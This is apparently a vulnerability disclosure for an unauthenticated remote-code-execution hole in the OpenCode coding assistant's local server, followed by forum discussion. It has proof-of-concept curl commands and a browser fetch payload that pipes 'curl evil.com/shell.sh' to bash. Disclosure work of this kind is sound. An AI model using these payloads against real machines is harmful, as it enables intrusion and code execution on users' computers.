Unauthenticated remote code execution in OpenCode

2026-01-1122:33432142cy.md

Affected software: OpenCode (npm: opencode-ai) CVE: CVE-2026-22812 TL;DR: Before v1.1.10, OpenCode automatically and silently started an unauthenticated web server which allowed connecting peers to…

Affected software: OpenCode (npm: opencode-ai)
CVE: CVE-2026-22812

TL;DR:

  • Before v1.1.10, OpenCode automatically and silently started an unauthenticated web server which allowed connecting peers to execute arbitrary code.
  • Before v1.0.216, any website could execute arbitrary code on your machine if OpenCode was running — no user interaction or configuration necessary.
  • Since v1.1.10, the server is disabled by default, but when enabled (via flags or config) it remains completely unauthenticated.

OpenCode is an open-source AI coding assistant. Prior to v1.1.10, it automatically spawned an HTTP server (default port 4096+) on startup. Since v1.1.10, the server is disabled by default but can be enabled via command-line flags or configuration file. When running, the server exposes endpoints for:

  • Executing arbitrary shell commands (POST /session/:id/shell)
  • Creating interactive terminal sessions (POST /pty)
  • Reading arbitrary files (GET /file/content)

This server has no authentication. Any client that can connect to it gains full code execution with the privileges of the user running OpenCode. When the server is running, there is no visible indication to the user.

Note: The CORS policy hardcodes *.opencode.ai as an allowed origin. This means any page served from opencode.ai or its subdomains can access the server API when it's running. If opencode.ai is ever compromised, or an XSS vulnerability is found on any subdomain, attackers could exploit all users who have the server enabled.

Attack Vectors

Attack Vector Affected Versions Status Vendor Advisory
Any website can execute code on any OpenCode user's machine < 1.0.216 Fixed in v1.0.216 Silent fix
Any process on the local machine can execute code as the OpenCode user < 1.1.10 Mitigated in v1.1.10 Silent fix
Any web page served from localhost/127.0.0.1 can execute code < 1.1.10 Mitigated in v1.1.10 Silent fix
When server is enabled, any local process can execute code without authentication All versions Unfixed None
When server is enabled, any web page served from localhost/127.0.0.1 can execute code All versions Unfixed None
No indication when server is running (users may be unaware of exposure) All versions Unfixed None
With --mdns, any machine on the local network can execute code All versions Unfixed None
*.opencode.ai can execute code when server is running All versions Unfixed None
If opencode.ai is compromised, attackers gain access to users with server enabled All versions Unfixed None
Any XSS on opencode.ai can compromise users with server enabled All versions Unfixed None

Proof of Concept

Local Exploitation (when server is enabled)

Any process on the machine can execute commands when the server is running:

API="http://127.0.0.1:4096"
SESSION=$(curl -s -X POST "$API/session" -H "Content-Type: application/json" -d '{}' | jq -r '.id')
curl -s -X POST "$API/session/$SESSION/shell" \
  -H "Content-Type: application/json" \
  -d '{"agent":"build","command":"id > /tmp/pwned.txt"}'

Browser-Based Exploitation (pre-v1.0.216)

Before the CORS fix, any website could silently exploit visitors:

fetch('http://127.0.0.1:4096/session', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: '{}'
}).then(r => r.json()).then(s => {
  fetch(`http://127.0.0.1:4096/session/${s.id}/shell`, {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({agent:'build', command:'curl evil.com/shell.sh|bash'})
  })
})

Confirmed working in Firefox. Chrome's Local Network Access protection may prompt users.

Mitigations for Users

Immediate actions:

  • Check your version by running opencode --version
  • Update to v1.1.10 or newer to ensure the server is disabled by default
  • Check your config file for server.port or server.hostname settings which silently enable the server
  • Do not use the --mdns flag (binds to 0.0.0.0 without warning)
  • If you must enable the server, do not visit opencode.ai or any subdomains while it is running
  • Be aware that when the server is enabled, any local process can exploit it without authentication

Date Action Response (at disclosure)
2025-11-17 Reported via email to support@sst.dev per SECURITY.md No response
2025-12-27 Filed GitHub Security Advisory No response
2025-12-29 Issue independently publicly reported by another user
2025-12-30 Partial fix: CORS restricted in v1.0.216
2026-01-07 Escalated to community Discord No response
2026-01-08 Follow-up via issue comment Upstream responded to issue
2026-01-09 Server disabled by default in v1.1.10
2026-01-11 Full public disclosure
  • Restrict CORS to minimal required set (done in v1.0.216)
  • Disable server by default (done in v1.1.10)
  • Require authentication for all server requests
  • Clearly indicate to users when the server is running (e.g., startup message or persistent UI indicator)
  • Improve --mdns documentation to clearly explain it binds to 0.0.0.0 and allows any machine on the local network full access
  • Enforce TLS for server communication over network connections
  • Publish the GitHub Security Advisory and obtain CVE (CVE-2026-22812)
  • Ensure the security reporting email address is monitored
  • Ensure GHSA notifications are monitored
  • Clarify trust relationship between OpenCode maintainers, opencode.ai, and OpenCode users

Questions about this disclosure: cy.md


Read the original article

Comments

  • By thdxr 2026-01-1219:1513 reply

    hey maintainer here

    we've done a poor job handling these security reports, usage has grown rapidly and we're overwhelmed with issues

    we're meeting with some people this week to advise us on how to handle this better, get a bug bounty program funded and have some audits done

    • By Imustaskforhelp 2026-01-1219:372 reply

      My original message was more positive but after more looking into context, I am a bit more pessimistic.

      Now I must admit though that I am little concerned by the fact that the vulnerability reporters tried multiple times to contact you but till no avail. This is not a good look at all and I hope you can fix it asap as you mention

      I respect dax from the days of SST framework but this is genuinely such a bad look especially when they Reported on 2025-11-17, and multiple "no responses" after repeated attempts to contact the maintainers...

      Sure they reported the bug now but who knows what could have / might have even been happening as OpenCode was the most famous open source coding agent and surely more cybersec must have watched it, I can see a genuine possibility where something must have been used in the wild as well from my understanding from black hat adversaries

      I think this means that we should probably run models in gvisor/proper sandboxing efforts.

      Even right now, we don't know how many more such bugs might persist and can lead to even RCE.

      Dax, This short attention would make every adversary look for even more bugs / RCE vulnerabilities right now as we speak so you only have a very finite time in my opinion. I hope things can be done as fast as possible now to make OpenCode more safer.

      • By thdxr 2026-01-1219:565 reply

        the email they found was from a different repo and not monitored. this is ultimately our fault for not having a proper SECURITY.md on our main repository

        the issue that was reported was fixed as soon as we heard about it - going through the process of learning about the CVE process, etc now and setting everything up correctly. we get 100s of issues reported to us daily across various mediums and we're figuring out how to manage this

        i can't really say much beyond this is my own inexperience showing

        • By varenc 2026-01-133:461 reply

          Also consider putting a security.txt[0] file on your main domain, like here: https://opencode.ai/.well-known/security.txt

          I also just want to sympathize with the difficulty of spotting the real reports from the noise. For a time I helped manage a bug bounty program, and 95% of issues were long reports with plausible titles that ended up saying something like "if an attacker can access the user's device, they can access the user's device". Finding the genuine ones requires a lot of time and constant effort. Though you get a feel for it with experience.

          [0] https://en.wikipedia.org/wiki/Security.txt

          edit: I agree with the original report that the CORS fix, while a huge improvement, is not sufficient since it doesn't protect from things like malicious code running locally or on the network.

          edit2: Looks like you've already rolled out a password! Kudos.

          • By rando77 2026-01-1310:511 reply

            I've been thinking about using LLMs to help triage security vulnerabilities.

            If done in an auditably unlogged environment (with a limited output to the company, just saying escalate) it might also encourage people to share vulns they are worried about putting online.

            Does that make sense from your experience?

            [1] https://github.com/eb4890/echoresponse/blob/main/design.md

            • By varenc 2026-01-142:03

              I definitely think it's a viable idea! Someone like Hackerone or Bugcrowd would be especially well poised to build this since they can look at historical reports, see which ones ended up being investigated or getting bounties, and use the to validate or inform the LLM system.

              The 2nd order effects of this, when reporters expect an LLM to be validating their report, may get tricky. But ultimately if it's only passing a "likely warrants investigation" signal and has very few false negatives, it sounds useful.

              With trust and security though, I still feel like some human needs to be ultimately responsible for closing each bad report as "invalid" and never purely relying on the LLM. But it sounds useful for elevating valid high severity reports and assisting the human ultimately responsible.

              Though it does feels like a hard product to build from scratch, but easy for existing bug bounty systems to add.

        • By KolenCh 2026-01-1310:43

          I learnt this the hard way: if anyone is sending multiple emails, with seemingly very important titles and messages, and they get no reply at all, the receiver likely haven’t received your email rather than completely ghosting you. Everyone should know this, and at least try a different channel of communication before further actions, especially from those disclosing vulnerability.

        • By Imustaskforhelp 2026-01-1223:55

          Thanks for providing additional context. I appreciate the fact that you are admitting fault where it is and that's okay because its human to make errors and I have full faith from your response that OpenCode will learn from its errors.

          I might try OpenCode now once its get patched or after seeing the community for a while. Wishing the best of luck for a more secure future of opencode!

        • By BoredPositron 2026-01-138:441 reply

          Fixed? You just change it to be off by default giving the security burden to your users. It's not fixed it's buried with minimal mitigation and you give no indication to your users that it will make your machine vulnerable if activated. Shady.

        • By euazOn 2026-01-1220:16

          I am also baffled at how long this vulnerability was left open, but I’m glad you’re at least making changes to hopefully avoid such mistakes in the future.

          Just a thought, have you tried any way to triage these reported issues via LLMs, or constantly running an LLM to check the codebase for gaping security holes? Would that be in any way useful?

          Anyway, thanks for your work on opencode and good luck.

      • By jannniii 2026-01-1317:14

        They are a small team and tool has gotten wildly popular. Which is not to say that slowing down and addressing quality and security issues would not be a bad idea.

        I’ve been an active user of opencode for 7-8 months now, really like the tool, but beginning to get a feeling that the core team’s idea of keeping the core development to themselves is not going to scale any longer.

        Really loving opencode though!

    • By Rygian 2026-01-138:362 reply

      Don't waste your time and money on funding bug bounties or "getting audits done". Your staff will add another big security flaw just the next day, back to square one.

      Spend that money in reorganizing your management and training your staff so that everyone in your company is onboard with https://owasp.org/Top10/2025/A06_2025-Insecure_Design/ .

      • By staticassertion 2026-01-1312:411 reply

        If part of the problem was that no one was responding to a vulnerability report then a bug bounty program would potentially address that.

        • By liveoneggs 2026-01-1314:141 reply

          you just get spammed with the same three fake reports over and over

          • By staticassertion 2026-01-1315:00

            Triage is something that these services provide, exactly to deal with that.

      • By liveoneggs 2026-01-1314:15

        good try :)

    • By bopbopbop7 2026-01-1219:553 reply

      Why not just ask Claude to fix the security issues and make sure they don't happen again?

      • By Hamuko 2026-01-1220:261 reply

        And if you don't have a Claude subscription, you can just ask your friends to fix them via the remote code execution server.

        • By reactordev 2026-01-131:17

          There goes my discord side hustle, offering Claude code through your OpenCode.

      • By Y_Y 2026-01-1220:281 reply

        Talk about kicking someone while they're down...

        • By lostmsu 2026-01-1313:521 reply

          I imagine Claude would be able to at least fix this one.

          • By 0x500x79 2026-01-1316:03

            I imagine Claude helped write this one.

      • By croes 2026-01-1222:04

        Who knows what created the issues in the first place place

    • By digdugdirk 2026-01-1219:23

      I've been curious how this project will grow over time, it seems to have taken the lead as the first open source terminal agent framework/runner, and definitely seems to be growing faster than any organization would/could/should be able to manage.

      It really seems like the main focus of the project should be in how to organize the work of the project, rather than on the specs/requirements/development of the codebase itself.

      What are the general recommendations the team has been getting for how to manage the development velocity? And have you looked into various anarchist organizational principles?

    • By observationist 2026-01-1223:25

      Good luck, and thank you for eating the accountability sandwich and being up front about what you're doing. That's not always easy to do, and it's appreciated!

    • By heliumtera 2026-01-1219:441 reply

      Congrats on owning this, good job, respect

      • By shimman 2026-01-1220:271 reply

        It's hard to not own it when it's publicly disclosed. Maybe save the accolades for when they actually do something and not just say something.

        • By tommica 2026-01-1221:181 reply

          [flagged]

          • By shimman 2026-01-1222:301 reply

            In my limited existence on this earth, talk is very cheap and actions should matter more.

            • By Gigachad 2026-01-1223:371 reply

              Good idea. Start sending in some PRs to contribute then.

              • By shimman 2026-01-132:131 reply

                Unless they've recently invented a shitpost to typescript compiler, I'm afraid I'll have to devote my time elsewhere.

                • By maxbond 2026-01-136:26

                  Your time is your own but I feel compelled to point out that is in fact one of the things a coding assistant does.

    • By cryptonector 2026-01-146:44

      For one thing spend a lot more time analyzing your code for these bugs. Use expert humans + LLMs to come up with an analysis plan then use humans + LLMs to execute the plan.

    • By dionian 2026-01-1315:56

      I don't know much about your product, but I have to say that hearing this kind of blunt communication is really refreshing

    • By rtaylorgarlock 2026-01-1219:341 reply

      Respect for openness. Good work and good luck.

      • By Rygian 2026-01-138:332 reply

        I don't understand what is being encouraged here.

        Something is seriously wrong when we say "hey, respect!" to a company who develops an unauthenticated RCE feature that should glaringly shine [0] during any internal security analysis, on software that they are licensing in exchange for money [1], and then fumble and drop the ball on security reports when someone does their due diligence for them.

        If this company wants to earn any respect, they need at least to publish their post-mortem about how their software development practices allowed such a serious issue to reach shipping.

        This should come as a given, especially seeing that this company already works on software related to security (OpenAuth [2]).

        [0] https://owasp.org/Top10/2025/ - https://owasp.org/Top10/2025/A06_2025-Insecure_Design/ - https://owasp.org/Top10/2025/A01_2025-Broken_Access_Control/ - https://owasp.org/Top10/2025/A05_2025-Injection/

        [1] https://opencode.ai/enterprise

        [2] https://anoma.ly/

        • By Cornbilly 2026-01-1315:121 reply

          I’ve noticed this a lot with startup culture.

          It’s like an unwritten rule to only praise each other because to give honest criticism invites people to do the same to you and too much criticism will halt the gravy train.

          • By rtaylorgarlock 2026-01-1318:09

            I've struggled a bit on this: LinkedIn's positivity echo chamber vs. the negativity-rewarding dunk culture here. No greater power exists on HN than critical thinking using techno-logic in a negative direction, revenue and growth be damned.

            Opencode don't have to maintain Zen for so cheaply. I don't have to say anything positive nor encouraging, just like I don't have to sh!t on youtuber 'maintainers' to promise incredible open source efforts which do more to prove they should stick to videos rather than dev. Idk. Not exactly encouraging me to comment at effing all if any positivity or encouragement is responded with the usual "hm idk coach better check yoself" ya honestly I think i know exactly what to do

        • By GoblinSlayer 2026-01-139:171 reply

          Honestly RCE here is in the browser. Why the browser executes any code in sight and this code can do anything?

          • By Rygian 2026-01-139:251 reply

            It's called "the world wide web" and it works on the principle that a webpage served by computer A can contain links that point to other pages served by computer B.

            Whether that principle should have been sustained in the special case of "B = localhost" is a valid question. I think the consensus from the past 40 years has been "yes", probably based on the amount of unknown failure possibilities if the default was reversed to "no".

            • By GoblinSlayer 2026-01-1310:401 reply

              owasp A01 addresses this: Violation of the principle of least privilege, commonly known as deny by default, where access should only be granted for particular capabilities, roles, or users, but is available to anyone.

              Indeed, deny by default policy results in unknown failure possibilities, it's inherent to safety.

              • By pixl97 2026-01-1314:49

                >Violation of the principle of least privilege

                I completely agree with this, programs are too open most of the time.

                But, this also brings up a conundrum...

                Programs that are wide open and insecure typically are very forgiving of user misconfigurations and misunderstandings, so they are the ones that end up widely adopted. Whereas a secure by default application takes much more knowledge to use in most cases, even though they protect the end user better, see less distribution unless forced by some other mechanism such as compliance.

    • By falloutx 2026-01-1221:09

      Its okay, if you can fix it soon, it should be fine.

  • By kaliszad 2026-01-1223:375 reply

    Many people seem to be running OpenCode and similar tools on their laptop with basically no privilege separation, sandboxing, fine-grained permissions settings in the tool itself. This tendency is reflected also by how many plugins are designed, where the default assumption is the tool is running unrestricted on the computer next to some kind of IDE as many authentication callbacks go to some port on localhost and the fallback is to parse out the right parameter from the callback URL. Also for some reasons these tools tend to be relative resource hogs even when waiting for a reply from a remote provider. I mean, I am glad they exist, but it seems very rough around the edges compared to how much attention these tools get nowadays.

    Please run at least a dev-container or a VM for the tools. You can use RDP/ VNC/ Spice or even just the terminal with tmux to work within the confines of the container/ machine. You can mirror some stuff into the container/ machine with SSHFS, Samba/ NFS, 9p. You can use all the traditional tools, filesystems and such for reliable snapshots. Push the results separately or don't give direct unrestricted git access to the agent.

    It's not that hard. If you are super lazy, you can also pay for a VPS $5/month or something like that and run the workload there.

    • By tomrod 2026-01-131:374 reply

      Hi.

      > Please run at least a dev-container or a VM for the tools.

      I would like to know how to do this. Could you share your favorite how-to?

      • By kaliszad 2026-01-133:08

        I have a pretty non-standard setup but with very standard tools. I didn't follow any specific guide. I have ZFS as the filesystem, for each VM a ZVOL or dataset + raw image and libvirt/ KVM on top. This can be done using e.g. Debian GNU/ Linux in a somewhat straight forward way. You can probably do something like it in WSL2 on Windows although that doesn't really sandbox stuff much or with Docker/ Podman or with VirtualBox.

        If you want a dedicated virtual host, Proxmox seems to be pretty easy to install even for relative newcomers and it has a GUI that's decent for new people and seasoned admins as well.

        For the remote connection I just use SSH and tmux, so I can comfortably detach and reattach without killing the tool that's running inside the terminal on the remote machine.

        I hope this helps even though I didn't provide a step-by step guide.

      • By ciberado 2026-01-1314:28

        If you are using VSCode against WSL2 or Linux and you have installed Docker, managing devcontainers is very straightforward. What I usually do is to execute "Connect to host" or "Connect to WSL", then create the project directory and ask VSCode to "Add Dev Container Configuration File". Once the configuration file is created, VSCode itself will ask you if you want to start working inside the container. I'm impressed with the user experience of this feature, to be honest.

        Working with devcontainers from CLI wasn't very difficult [0], but I must confess that I only tested it once.

        [0] https://containers.dev/supporting

      • By AdieuToLogic 2026-01-134:151 reply

        >> Please run at least a dev-container or a VM for the tools.

        > I would like to know how to do this. Could you share your favorite how-to?

        See: https://www.docker.com/get-started/

        EDIT:

        Perhaps you are more interested in various sandboxing options. If so, the following may be of interest:

        https://news.ycombinator.com/item?id=46595393

        • By nyrikki 2026-01-1315:56

          Note that while containers can be leveraged to run processes at lower privilege levels, they are not secure by default, and actually run at elevated privileges compared to normal processes.

          Make sure the agent cannot launch containers and that you are switching users and dropping privileges.

          On a Mac you are running a VM machine that helps, but on Linux it is the user that is responsible for constraints, and by default it is trivial to bypass.

          Containers have been fairly successful for security because the most popular images have been leveraging traditional co-hosting methods, like nginx dropping root etc…

          By themselves without actively doing the same they are not a security feature.

          While there are some reactive defaults, Docker places the responsibility for dropping privileges on the user and image. Just launching a container is security through obscurity.

          It can be a powerful tool to improve security posture, but don’t expect it by default.

      • By yawaramin 2026-01-133:532 reply

        Hi. You are clearly an LLM user. Have you considered asking an LLM to explain how to do this? If not, why not?

        • By exe34 2026-01-137:422 reply

          would an LLM have a favourite tool? I'm sure it'll answer, but would it be from personal experience?

          • By yawaramin 2026-01-1315:381 reply

            I checked with Gemini 3 Fast and it provided instructions on how to set up a Dev Container or VM. It recommended a Dev Container and gave step-by-step instructions. It also mentioned VMs like VirtualBox and VMWare and recommended best practices.

            This is exactly what I would have expected from an expert. Is this not what you are getting?

            My broader question is: if someone is asking for instructions for setting up a local agent system, wouldn't it be fair to assume that they should try using an LLM to get instructions? Can't we assume that they are already bought in to the viewpoint that LLMs are useful?

            • By exe34 2026-01-1316:531 reply

              the llm will comment on the average case. when we ask a person for a favourite tool, we expect anecdotes about their own experience - I liked x, but when I tried to do y, it gave me z issues because y is an unusual requirement.

              when the question is asked on an open forum, we expect to get n such answers and sometimes we'll recognise our own needs in one or two of them that wouldn't be covered by the median case.

              does that make sense?

              • By yawaramin 2026-01-1318:20

                > when we ask a person for a favourite tool

                I think you're focusing too much on the word 'favourite' and not enough on the fact that they didn't actually ask for a favourite tool. They asked for a favourite how-to for using the suggested options, a Dev Container or a VM. I think before asking this question, if a person is (demonstrably in this case) into LLMs, it should be reasonable for them to ask an LLM first. The options are already given. It's not difficult to form a prompt that can make a reasonable LLM give a reasonable answer.

                There aren't that many ways to run a Dev Container or VM. Everyone is not special and different, just follow the recommended and common security best practices.

          • By cbm-vic-20 2026-01-1313:19

            In 2026? It will be the tool from the vendor who spends the most ad dollars with Anthropic/Google/etc.

        • By tomrod 2026-01-1412:04

          Because I value human input too.

    • By indigodaddy 2026-01-1415:08

      I've started a project [1] recently that tries to implement this sandbox idea. Very new and extremely alpha, but mostly works as a proof of concept (except haven't figured out how to get Shelley working yet), and I'm sure there's a ton of bugs and things to work through, but could be fun to test and experiment with in a vps and report back any issues.

      [1] https://github.com/jgbrwn/shelley-lxc

    • By _zoltan_ 2026-01-138:262 reply

      Claude asks you for permissions every time it wants to run something.

      • By estsauver 2026-01-139:05

        Until you run --dangerously-skip-permissions

      • By xmcqdpt2 2026-01-1312:58

        That's why you run with "dangerously allow all." What's the point of LLMs if I have to manually approve everything? IME you only get half decent results if the agent can run tests, run builds and iterate. I'm not going to look at the wall of texts it produces on every iterations, they are mostly convincing bullshit. I'll review the code it wrote once the tests pass, but I don't want to be "in the loop".

    • By Imustaskforhelp 2026-01-1223:46

      I really like the product created by fly.io's https://sprites.dev/ for AI's sandboxes effectively. I feel like its really apt here (not sponsored lmao wish I was)

      Oh btw if someone wants to run servers via qemu, I highly recommend quickemu. It provides default ssh access,sshfs, vnc,spice and all such ports to just your local device of course and also allows one to install debian or any distro (out of many many distros) using quickget.

      Its really intuitive for what its worth, definitely worth a try https://github.com/quickemu-project/quickemu

      I personally really like zed with ssh open remote. I can always open up terminals in it and use claude code or opencode or any and they provide AI as well (I dont use much AI this way, I make simple scripts for myself so I just copy paste for free from the websites) but I can recommend zed for what its worth as well.

  • By throw_me_uwu 2026-01-1221:124 reply

    WTF, they not just made unauthenticated RCE http endpoint, they also helpfully added CORS bypass for it... all in CLI tool? That silently starts http server??

HackerNews